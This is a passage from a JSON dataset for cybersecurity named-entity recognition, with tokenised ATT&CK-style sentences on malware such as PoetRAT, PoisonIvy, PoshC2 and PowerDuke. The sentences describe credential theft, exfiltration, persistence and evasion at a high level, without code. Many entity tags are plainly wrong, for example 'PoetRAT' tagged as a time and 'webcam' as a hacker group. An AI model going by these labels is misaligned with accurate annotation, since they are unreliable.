"communications." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoetRAT", "used", "file", "system", "monitoring", "to", "track", "modification", "and", "enable", "automatic", "exfiltration." ], "ner_tags": [ "B-SamFile", "O", "B-Tool", "B-Features", "O", "O", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "PoetRAT", "has", "`pyminifier`", "to", "obfuscate", "scripts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoetRAT", "has", "executed", "a", "Lua", "script", "through", "a", "Lua", "interpreter", "for", "Windows." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "PoetRAT", "has", "used", "a", "Python", "tool", "named", "Browdec.exe", "to", "steal", "browser", "credentials." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "PoetRAT", "has", "used", "LZMA", "and", "base64", "libraries", "to", "decode", "obfuscated", "scripts." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoetRAT", "was", "delivered", "with", "documents", "using", "DDE", "to", "execute", "malicious", "code." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "PoetRAT", "has", "used", "a", ".NET", "tool", "named", "dog.exe", "to", "exiltrate", "information", "over", "an", "e-mail", "account." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "B-Tool", "O", "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "B-Way", "O" ] }, { "tokens": [ "PoetRAT", "has", "exfiltrated", "data", "over", "the", "C2", "channel." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoetRAT", "has", "used", "ftp", "for", "exfiltration." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "PoetRAT", "has", "the", "ability", "to", "overwrite", "scripts", "and", "delete", "itself", "if", "a", "sandbox", "environment", "is", "detected." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoetRAT", "has", "used", "FTP", "for", "C2", "communications." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoetRAT", "has", "the", "ability", "to", "list", "files", "upon", "receiving", "the", "<code>ls</code>", "command", "from", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoetRAT", "has", "the", "ability", "to", "hide", "and", "unhide", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoetRAT", "has", "the", "ability", "to", "copy", "files", "and", "download/upload", "files", "into", "C2", "channels", "using", "FTP", "and", "HTTPS." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "B-Features", "I-Features", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "PoetRAT", "has", "used", "a", "Python", "tool", "named", "klog.exe", "for", "keylogging." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "PoetRAT", "used", "voStro.exe,", "a", "compiled", "pypykatz", "(Python", "version", "of", "Mimikatz),", "to", "steal", "credentials." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Purp", "O" ] }, { "tokens": [ "PoetRAT", "has", "used", "spearphishing", "attachments", "to", "infect", "victims." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "PoetRAT", "has", "made", "registry", "modifications", "to", "alter", "its", "behavior", "upon", "execution." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoetRAT", "used", "TLS", "to", "encrypt", "communications", "over", "port", "143" ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoetRAT", "has", "used", "a", "custom", "encryption", "scheme", "for", "communication", "between", "scripts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "PoetRAT", "has", "the", "ability", "to", "list", "all", "running", "processes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "PoetRAT", "was", "executed", "with", "a", "Python", "script", "and", "worked", "in", "conjunction", "with", "additional", "Python-based", "post-exploitation", "tools." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoetRAT", "has", "added", "a", "registry", "key", "in", "the", "<RUN>", "hive", "for", "persistence." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoetRAT", "used", "Nmap", "for", "remote", "system", "discovery." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "PoetRAT", "has", "the", "ability", "to", "take", "screen", "captures." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "PoetRAT", "was", "distributed", "via", "malicious", "Word", "documents." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "I-SamFile", "O" ] }, { "tokens": [ "PoetRAT", "checked", "the", "size", "of", "the", "hard", "drive", "to", "determine", "if", "it", "was", "being", "run", "in", "a", "sandbox", "environment.", "In", "the", "event", "of", "sandbox", "detection,", "it", "would", "delete", "itself", "by", "overwriting", "the", "malware", "scripts", "with", "the", "contents", "of", "\"License.txt\"", "and", "exiting." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "PoetRAT", "has", "the", "ability", "to", "gather", "information", "about", "the", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "PoetRAT", "sent", "username,", "computer", "name,", "and", "the", "previously", "generated", "UUID", "in", "reply", "to", "a", "\"who\"", "command", "from", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoetRAT", "has", "used", "a", "Python", "tool", "named", "Bewmac", "to", "record", "the", "webcam", "on", "compromised", "hosts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "PoetRAT", "has", "used", "Word", "documents", "with", "VBScripts", "to", "execute", "malicious", "activities." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "PoetRAT", "has", "used", "HTTP", "and", "HTTPs", "for", "C2", "communications." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "PoetRAT", "has", "called", "cmd", "through", "a", "Word", "document", "macro." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "B-Tool", "B-SamFile", "O" ] }, { "tokens": [ "PoisonIvy", "creates", "a", "Registry", "key", "in", "the", "Active", "Setup", "pointing", "to", "a", "malicious", "executable." ], "ner_tags": [ "B-Way", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoisonIvy", "captures", "window", "titles." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "O" ] }, { "tokens": [ "PoisonIvy", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "steal", "system", "information." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "PoisonIvy", "can", "inject", "a", "malicious", "DLL", "into", "a", "process." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "PoisonIvy", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "upload", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "B-Features", "O" ] }, { "tokens": [ "PoisonIvy", "contains", "a", "keylogger." ], "ner_tags": [ "B-Way", "O", "O", "B-Way" ] }, { "tokens": [ "PoisonIvy", "stages", "collected", "data", "in", "a", "text", "file." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoisonIvy", "creates", "a", "Registry", "subkey", "that", "registers", "a", "new", "system", "device." ], "ner_tags": [ "B-Way", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoisonIvy", "hides", "any", "strings", "related", "to", "its", "own", "indicators", "of", "compromise." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoisonIvy", "creates", "run", "key", "Registry", "entries", "pointing", "to", "a", "malicious", "executable", "dropped", "to", "disk." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoisonIvy", "starts", "a", "rootkit", "from", "a", "malicious", "file", "dropped", "to", "disk." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoisonIvy", "uses", "the", "Camellia", "cipher", "to", "encrypt", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Idus" ] }, { "tokens": [ "PoisonIvy", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "open", "a", "command-line", "interface." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoisonIvy", "creates", "a", "Registry", "subkey", "that", "registers", "a", "new", "service.", "PoisonIvy", "also", "creates", "a", "Registry", "entry", "modifying", "the", "Logical", "Disk", "Manager", "service", "to", "point", "to", "a", "malicious", "DLL", "dropped", "to", "disk." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PolyglotDuke", "can", "use", "Twitter,", "Reddit,", "Imgur", "and", "other", "websites", "to", "get", "a", "C2", "URL." ], "ner_tags": [ "B-Way", "O", "O", "B-Org", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PolyglotDuke", "can", "use", "a", "custom", "algorithm", "to", "decrypt", "strings", "used", "by", "the", "malware." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Tool", "I-Tool", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "PolyglotDuke", "can", "store", "encrypted", "JSON", "configuration", "files", "in", "the", "Registry." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PolyglotDuke", "can", "retrieve", "payloads", "from", "the", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PolyglotDuke", "can", "write", "encrypted", "JSON", "configuration", "files", "to", "the", "Registry." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PolyglotDuke", "can", "use", "<code>LoadLibraryW</code>", "and", "<code>CreateProcess</code>", "to", "load", "and", "execute", "code." ], "ner_tags": [ "B-Way", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PolyglotDuke", "can", "custom", "encrypt", "strings." ], "ner_tags": [ "B-Way", "O", "I-Features", "B-HackOrg", "O" ] }, { "tokens": [ "PolyglotDuke", "can", "be", "executed", "using", "rundll32.exe." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "PolyglotDuke", "can", "use", "steganography", "to", "hide", "C2", "information", "in", "images." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PolyglotDuke", "has", "has", "used", "HTTP", "GET", "requests", "in", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pony", "has", "used", "scripts", "to", "delete", "itself", "after", "execution." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pony", "can", "download", "additional", "files", "onto", "the", "infected", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Pony", "has", "used", "the", "<code>NetUserEnum</code>", "function", "to", "enumerate", "local", "accounts." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pony", "has", "attempted", "to", "lure", "targets", "into", "downloading", "an", "attached", "executable", "(ZIP,", "RAR,", "or", "CAB", "archives)", "or", "document", "(PDF", "or", "other", "MS", "Office", "format)." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pony", "has", "attempted", "to", "lure", "targets", "into", "clicking", "links", "in", "spoofed", "emails", "from", "legitimate", "banks." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Idus" ] }, { "tokens": [ "Pony", "has", "used", "the", "Adobe", "Reader", "icon", "for", "the", "downloaded", "file", "to", "look", "more", "trustworthy." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pony", "has", "used", "several", "Windows", "functions", "for", "various", "purposes." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Purp", "O" ] }, { "tokens": [ "Pony", "attachments", "have", "been", "delivered", "via", "compressed", "archive", "files.", "Pony", "also", "obfuscates", "the", "memory", "flow", "by", "adding", "junk", "instructions", "when", "executing", "to", "make", "analysis", "more", "difficult." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "B-SamFile", "I-Features", "I-Features", "I-Features", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pony", "has", "used", "a", "small", "dictionary", "of", "common", "passwords", "against", "a", "collected", "list", "of", "local", "accounts." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pony", "has", "been", "delivered", "via", "spearphishing", "attachments." ], "ner_tags": [ "B-Tool", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Pony", "has", "been", "delivered", "via", "spearphishing", "emails", "which", "contained", "malicious", "links." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Pony", "has", "collected", "the", "Service", "Pack,", "language,", "and", "region", "information", "to", "send", "to", "the", "C2." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pony", "has", "delayed", "execution", "using", "a", "built-in", "function", "to", "avoid", "detection", "and", "analysis." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pony", "has", "sent", "collected", "information", "to", "the", "C2", "via", "HTTP", "POST", "request." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Pony", "has", "used", "batch", "scripts", "to", "delete", "itself", "after", "execution." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoshC2", "can", "use", "Invoke-TokenManipulation", "for", "manipulating", "tokens." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "PoshC2", "contains", "a", "module", "for", "compressing", "data", "using", "ZIP." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "PoshC2", "contains", "a", "module", "for", "recursively", "parsing", "through", "files", "and", "directories", "to", "gather", "valid", "credit", "card", "numbers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "PoshC2", "has", "modules", "for", "brute", "forcing", "local", "administrator", "and", "AD", "user", "accounts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoshC2", "can", "utilize", "multiple", "methods", "to", "bypass", "UAC." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "PoshC2", "can", "use", "Invoke-RunAs", "to", "make", "tokens." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "PoshC2", "contains", "modules", "for", "searching", "for", "passwords", "in", "local", "and", "remote", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoshC2", "can", "decrypt", "passwords", "stored", "in", "the", "RDCMan", "configuration", "file." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "B-HackOrg", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "PoshC2", "can", "enumerate", "local", "and", "domain", "user", "account", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoshC2", "has", "modules", "for", "enumerating", "domain", "trusts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoshC2", "contains", "modules", "for", "local", "privilege", "escalation", "exploits", "such", "as", "CVE-2016-9192", "and", "CVE-2016-0099." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Features" ] }, { "tokens": [ "PoshC2", "contains", "a", "module", "for", "exploiting", "SMB", "via", "EternalBlue." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "PoshC2", "can", "enumerate", "files", "on", "the", "local", "file", "system", "and", "includes", "a", "module", "for", "enumerating", "recently", "accessed", "files." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoshC2", "has", "modules", "for", "keystroke", "logging", "and", "capturing", "credentials", "from", "spoofed", "Outlook", "authentication", "messages." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Features", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoshC2", "can", "use", "Inveigh", "to", "conduct", "name", "service", "poisoning", "for", "credential", "theft", "and", "associated", "relay", "attacks." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "I-Way", "I-Way", "I-Way", "O", "B-SamFile", "B-Purp", "O", "O", "I-OffAct", "O" ] }, { "tokens": [ "PoshC2", "contains", "an", "implementation", "of", "Mimikatz", "to", "gather", "credentials", "from", "memory." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "PoshC2", "can", "enumerate", "local", "and", "domain", "user", "account", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoshC2", "contains", "modules,", "such", "as", "<code>Get-LocAdm</code>", "for", "enumerating", "permission", "groups." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "PoshC2", "can", "perform", "port", "scans", "from", "an", "infected", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoshC2", "contains", "a", "module", "for", "taking", "packet", "captures", "on", "compromised", "hosts." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoshC2", "has", "a", "number", "of", "modules", "that", "leverage", "pass", "the", "hash", "for", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoshC2", "can", "use", "<code>Get-PassPol</code>", "to", "enumerate", "the", "domain", "password", "policy." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoshC2", "contains", "multiple", "modules", "for", "injecting", "into", "processes,", "such", "as", "<code>Invoke-PSInject</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "PoshC2", "contains", "modules", "that", "allow", "for", "use", "of", "proxies", "in", "command", "and", "control." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "PoshC2", "contains", "an", "implementation", "of", "PsExec", "for", "remote", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "PoshC2", "contains", "modules,", "such", "as", "<code>Get-ComputerInfo</code>,", "for", "enumerating", "common", "system", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "PoshC2", "can", "enumerate", "network", "adapter", "information." ], "ner_tags": [ "B-Idus", "O", "B-Features", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "PoshC2", "contains", "an", "implementation", "of", "netstat", "to", "enumerate", "TCP", "and", "UDP", "connections." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "B-Way", "O" ] }, { "tokens": [ "PoshC2", "can", "enumerate", "service", "and", "service", "permission", "information." ], "ner_tags": [ "B-Idus", "O", "B-Features", "I-Features", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "PoshC2", "can", "use", "protocols", "like", "HTTP/HTTPS", "for", "command", "and", "control", "traffic." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PoshC2", "has", "a", "number", "of", "modules", "that", "use", "WMI", "to", "execute", "tasks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "PoshC2", "has", "the", "ability", "to", "persist", "on", "a", "system", "using", "WMI", "events." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "PowGoop", "can", "side-load", "`Goopdate.dll`", "into", "`GoogleUpdate.exe`." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "PowGoop", "can", "decrypt", "PowerShell", "scripts", "for", "execution." ], "ner_tags": [ "B-Way", "O", "B-Features", "B-HackOrg", "B-Tool", "O", "O" ] }, { "tokens": [ "PowGoop", "can", "receive", "encrypted", "commands", "from", "C2." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "PowGoop", "has", "disguised", "a", "PowerShell", "script", "as", "a", ".dat", "file", "(goopdate.dat)." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "B-SamFile", "I-SamFile", "B-SamFile" ] }, { "tokens": [ "PowGoop", "has", "used", "a", "DLL", "named", "Goopdate.dll", "to", "impersonate", "a", "legitimate", "Google", "update", "file." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowGoop", "can", "use", "a", "modified", "Base64", "encoding", "mechanism", "to", "send", "data", "to", "and", "from", "the", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowGoop", "has", "the", "ability", "to", "use", "PowerShell", "scripts", "to", "execute", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "PowGoop", "can", "send", "HTTP", "GET", "requests", "to", "malicious", "servers." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Power", "Loader", "overwrites", "Explorer’s", "Shell_TrayWnd", "extra", "window", "memory", "to", "redirect", "execution", "to", "a", "NTDLL", "function", "that", "is", "abused", "to", "assemble", "and", "execute", "a", "return-oriented", "programming", "(ROP)", "chain", "and", "create", "a", "malicious", "thread", "within", "Explorer.exe." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "B-SamFile" ] }, { "tokens": [ "PowerDuke", "has", "a", "command", "to", "get", "text", "of", "the", "current", "foreground", "window." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerDuke", "has", "a", "command", "to", "write", "random", "data", "across", "a", "file", "and", "delete", "it." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "PowerDuke", "has", "a", "command", "to", "write", "random", "data", "across", "a", "file", "and", "delete", "it." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "PowerDuke", "has", "commands", "to", "get", "the", "current", "directory", "name", "as", "well", "as", "the", "size", "of", "a", "file.", "It", "also", "has", "commands", "to", "obtain", "information", "about", "logical", "drives,", "drive", "type,", "and", "free", "space." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "I-Features", "O", "O", "I-Features", "O" ] }, { "tokens": [ "PowerDuke", "has", "a", "command", "to", "download", "a", "file." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerDuke", "hides", "many", "of", "its", "backdoor", "payloads", "in", "an", "alternate", "data", "stream", "(ADS)." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerDuke", "has", "a", "command", "to", "list", "the", "victim's", "processes." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerDuke", "achieves", "persistence", "by", "using", "various", "Registry", "Run", "keys." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "B-Way" ] }, { "tokens": [ "PowerDuke", "uses", "rundll32.exe", "to", "load." ], "ner_tags": [ "B-Way", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "PowerDuke", "uses", "steganography", "to", "hide", "backdoors", "in", "PNG", "files,", "which", "are", "also", "encrypted", "using", "the", "Tiny", "Encryption", "Algorithm", "(TEA)." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O", "B-Tool", "O" ] }, { "tokens": [ "PowerDuke", "has", "commands", "to", "get", "information", "about", "the", "victim's", "name,", "build,", "version,", "serial", "number,", "and", "memory", "usage." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "PowerDuke", "has", "a", "command", "to", "get", "the", "victim's", "domain", "and", "NetBIOS", "name." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerDuke", "has", "commands", "to", "get", "the", "current", "user's", "name", "and", 